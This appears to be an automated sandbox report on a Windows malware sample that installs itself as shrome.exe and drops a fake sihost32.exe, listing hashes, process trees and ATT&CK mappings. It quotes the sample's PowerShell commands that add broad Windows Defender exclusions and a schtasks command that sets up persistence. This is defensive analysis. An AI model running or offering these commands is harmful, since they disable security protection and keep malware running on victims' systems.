Analysis

  • max time kernel
    126s
  • max time network
    135s
  • platform
    windows7_x64
  • resource
    win7-en-20210920
  • submitted
    14-10-2021 05:08

General

  • Target

    fa409741e16094bb8bc373d7b46742cd.exe

  • Size

    1.9MB

  • MD5

    fa409741e16094bb8bc373d7b46742cd

  • SHA1

    e082dd13c52fe7fb65fac801d2588e0c9153d9cc

  • SHA256

    c5c1c355c0e253df7b6a49d296c00663cc9692328dd236ab4f43fafc2ec70ec8

  • SHA512

    7cedd8048df9b44587f55c9ccc5afcd8f0ada0fa119c9848a3c19f364fcdd947b8e54dab9ffce0f425484bb76f7d7e5db18a7516ddb5cde9a4f053e6c105046f

Score
8/10

Malware Config

Signatures

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 4 IoCs
  • Drops file in System32 directory 6 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 41 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fa409741e16094bb8bc373d7b46742cd.exe
    "C:\Users\Admin\AppData\Local\Temp\fa409741e16094bb8bc373d7b46742cd.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1316
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\fa409741e16094bb8bc373d7b46742cd.exe"
      2⤵
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1408
      • C:\Windows\System32\cmd.exe
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1452
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
          4⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1228
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
          4⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1508
      • C:\Windows\System32\cmd.exe
        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "shrome" /tr "C:\Windows\system32\shrome.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1144
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "shrome" /tr "C:\Windows\system32\shrome.exe"
          4⤵
          • Creates scheduled task(s)
          PID:1816
      • C:\Windows\System32\cmd.exe
        "cmd" cmd /c "C:\Windows\system32\shrome.exe"
        3⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1748
        • C:\Windows\system32\shrome.exe
          C:\Windows\system32\shrome.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1772
          • C:\Windows\System32\conhost.exe
            "C:\Windows\System32\\conhost.exe" "C:\Windows\system32\shrome.exe"
            5⤵
            • Loads dropped DLL
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:548
            • C:\Windows\System32\cmd.exe
              "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1752
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                7⤵
                • Drops file in System32 directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:112
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                7⤵
                • Drops file in System32 directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1132
            • C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
              "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
              6⤵
              • Executes dropped EXE
              PID:1276
              • C:\Windows\System32\conhost.exe
                "C:\Windows\System32\\conhost.exe" "/sihost32"
                7⤵
                PID:836

    Network

    MITRE ATT&CK Matrix (ATT&CK v6)

    • Execution: Scheduled Task (1) T1053
    • Persistence: Scheduled Task (1) T1053
    • Privilege Escalation: Scheduled Task (1) T1053

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
      MD5

      9839a153dd23f855e14ced0d44035208

      SHA1

      276add3c053dd890b6386e64e13df8bb2cb9a853

      SHA256

      ff48a647e20916e7d2026caefcb6280a83209af6cfb9da271d24ec17d5f12e94

      SHA512

      416ac27c93af1abc146c2f848477fa38f079cf6252d232aa1d9f7fb42ddbf6bc65016b4dcdf13f939def7c686ac303e1d8e7434916d3e0de7c12140b1fccf941

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
      MD5

      a07cf59ef745ea27ea563d21fd2881d7

      SHA1

      f46837adee2b5c702bb0196e7cabb87ca203b5d2

      SHA256

      2134fdde87cefc1c5f4f6b2e2ba906584ba6bf247ddb0884a845b11c7a996fd1

      SHA512

      122c64c7790f1f23331af4a790c01720b516b534565e0e7a4cc0f6b4f52ec903d1a2b16d6ad353455308c6296988ce257f29386b75745a9ecbd8f9b0e6b7f247

    • C:\Windows\System32\Microsoft\Telemetry\sihost32.exe
      MD5

      cceaed462cd04bcc64c90e5d0f11df59

      SHA1

      7a1b253f70f7b30decac1098245431459d8e96b5

      SHA256

      a86a112c0ae1c068097d28318510c31344f6624c86004bd822f43772d3e5f682

      SHA512

      3df0923bb0a15c714c19b8e7252bf6b16800accea2c084b002535c85826a8163e6766a8a50751a49d417930d387459aca8425a845a5c3af298515579473b45b9

    • C:\Windows\System32\shrome.exe
      MD5

      fa409741e16094bb8bc373d7b46742cd

      SHA1

      e082dd13c52fe7fb65fac801d2588e0c9153d9cc

      SHA256

      c5c1c355c0e253df7b6a49d296c00663cc9692328dd236ab4f43fafc2ec70ec8

      SHA512

      7cedd8048df9b44587f55c9ccc5afcd8f0ada0fa119c9848a3c19f364fcdd947b8e54dab9ffce0f425484bb76f7d7e5db18a7516ddb5cde9a4f053e6c105046f

    • C:\Windows\system32\shrome.exe
      MD5

      fa409741e16094bb8bc373d7b46742cd

      SHA1

      e082dd13c52fe7fb65fac801d2588e0c9153d9cc

      SHA256

      c5c1c355c0e253df7b6a49d296c00663cc9692328dd236ab4f43fafc2ec70ec8

      SHA512

      7cedd8048df9b44587f55c9ccc5afcd8f0ada0fa119c9848a3c19f364fcdd947b8e54dab9ffce0f425484bb76f7d7e5db18a7516ddb5cde9a4f053e6c105046f

    • \??\PIPE\srvsvc
      MD5

      d41d8cd98f00b204e9800998ecf8427e

      SHA1

      da39a3ee5e6b4b0d3255bfef95601890afd80709

      SHA256

      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

      SHA512

      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

    • \Windows\System32\Microsoft\Telemetry\sihost32.exe
      MD5

      cceaed462cd04bcc64c90e5d0f11df59

      SHA1

      7a1b253f70f7b30decac1098245431459d8e96b5

      SHA256

      a86a112c0ae1c068097d28318510c31344f6624c86004bd822f43772d3e5f682

      SHA512

      3df0923bb0a15c714c19b8e7252bf6b16800accea2c084b002535c85826a8163e6766a8a50751a49d417930d387459aca8425a845a5c3af298515579473b45b9

    • \Windows\System32\shrome.exe
      MD5

      fa409741e16094bb8bc373d7b46742cd

      SHA1

      e082dd13c52fe7fb65fac801d2588e0c9153d9cc

      SHA256

      c5c1c355c0e253df7b6a49d296c00663cc9692328dd236ab4f43fafc2ec70ec8

      SHA512

      7cedd8048df9b44587f55c9ccc5afcd8f0ada0fa119c9848a3c19f364fcdd947b8e54dab9ffce0f425484bb76f7d7e5db18a7516ddb5cde9a4f053e6c105046f

    • memory/112-102-0x0000000002342000-0x0000000002344000-memory.dmp
      Filesize

      8KB

    • memory/112-96-0x000007FEEC750000-0x000007FEED2AD000-memory.dmp
      Filesize

      11.4MB

    • memory/112-88-0x0000000000000000-mapping.dmp
    • memory/112-101-0x0000000002340000-0x0000000002342000-memory.dmp
      Filesize

      8KB

    • memory/112-108-0x000000000234B000-0x000000000236A000-memory.dmp
      Filesize

      124KB

    • memory/112-103-0x0000000002344000-0x0000000002347000-memory.dmp
      Filesize

      12KB

    • memory/548-97-0x000000001B192000-0x000000001B194000-memory.dmp
      Filesize

      8KB

    • memory/548-100-0x000000001B197000-0x000000001B198000-memory.dmp
      Filesize

      4KB

    • memory/548-99-0x000000001B196000-0x000000001B197000-memory.dmp
      Filesize

      4KB

    • memory/548-98-0x000000001B194000-0x000000001B196000-memory.dmp
      Filesize

      8KB

    • memory/836-116-0x000000001AD72000-0x000000001AD74000-memory.dmp
      Filesize

      8KB

    • memory/836-114-0x0000000000310000-0x0000000000313000-memory.dmp
      Filesize

      12KB

    • memory/836-117-0x000000001AD74000-0x000000001AD76000-memory.dmp
      Filesize

      8KB

    • memory/836-118-0x000000001AD76000-0x000000001AD77000-memory.dmp
      Filesize

      4KB

    • memory/836-119-0x000000001AD77000-0x000000001AD78000-memory.dmp
      Filesize

      4KB

    • memory/1132-111-0x00000000029D2000-0x00000000029D4000-memory.dmp
      Filesize

      8KB

    • memory/1132-109-0x000000001B7A0000-0x000000001BA9F000-memory.dmp
      Filesize

      3.0MB

    • memory/1132-113-0x00000000029DB000-0x00000000029FA000-memory.dmp
      Filesize

      124KB

    • memory/1132-110-0x00000000029D0000-0x00000000029D2000-memory.dmp
      Filesize

      8KB

    • memory/1132-112-0x00000000029D4000-0x00000000029D7000-memory.dmp
      Filesize

      12KB

    • memory/1132-104-0x0000000000000000-mapping.dmp
    • memory/1132-107-0x000007FEF1E40000-0x000007FEF299D000-memory.dmp
      Filesize

      11.4MB

    • memory/1144-63-0x0000000000000000-mapping.dmp
    • memory/1228-67-0x0000000002740000-0x0000000002742000-memory.dmp
      Filesize

      8KB

    • memory/1228-61-0x0000000000000000-mapping.dmp
    • memory/1228-62-0x000007FEFB891000-0x000007FEFB893000-memory.dmp
      Filesize

      8KB

    • memory/1228-68-0x0000000002742000-0x0000000002744000-memory.dmp
      Filesize

      8KB

    • memory/1228-70-0x000000000274B000-0x000000000276A000-memory.dmp
      Filesize

      124KB

    • memory/1228-64-0x000007FEEEE40000-0x000007FEEF7DD000-memory.dmp
      Filesize

      9.6MB

    • memory/1228-69-0x0000000002744000-0x0000000002747000-memory.dmp
      Filesize

      12KB

    • memory/1276-92-0x0000000000000000-mapping.dmp
    • memory/1408-59-0x000000001B1E6000-0x000000001B1E7000-memory.dmp
      Filesize

      4KB

    • memory/1408-54-0x00000000000B0000-0x00000000002A1000-memory.dmp
      Filesize

      1.9MB

    • memory/1408-56-0x000000001B450000-0x000000001B63D000-memory.dmp
      Filesize

      1.9MB

    • memory/1408-58-0x000000001B1E4000-0x000000001B1E6000-memory.dmp
      Filesize

      8KB

    • memory/1408-55-0x000000001B1E2000-0x000000001B1E4000-memory.dmp
      Filesize

      8KB

    • memory/1408-66-0x000000001B1E7000-0x000000001B1E8000-memory.dmp
      Filesize

      4KB

    • memory/1452-60-0x0000000000000000-mapping.dmp
    • memory/1508-75-0x0000000002640000-0x0000000002642000-memory.dmp
      Filesize

      8KB

    • memory/1508-78-0x000000000264B000-0x000000000266A000-memory.dmp
      Filesize

      124KB

    • memory/1508-77-0x0000000002644000-0x0000000002647000-memory.dmp
      Filesize

      12KB

    • memory/1508-76-0x0000000002642000-0x0000000002644000-memory.dmp
      Filesize

      8KB

    • memory/1508-74-0x000007FEED0F0000-0x000007FEEDC4D000-memory.dmp
      Filesize

      11.4MB

    • memory/1508-71-0x0000000000000000-mapping.dmp
    • memory/1748-79-0x0000000000000000-mapping.dmp
    • memory/1752-87-0x0000000000000000-mapping.dmp
    • memory/1772-83-0x0000000000000000-mapping.dmp
    • memory/1816-65-0x0000000000000000-mapping.dmp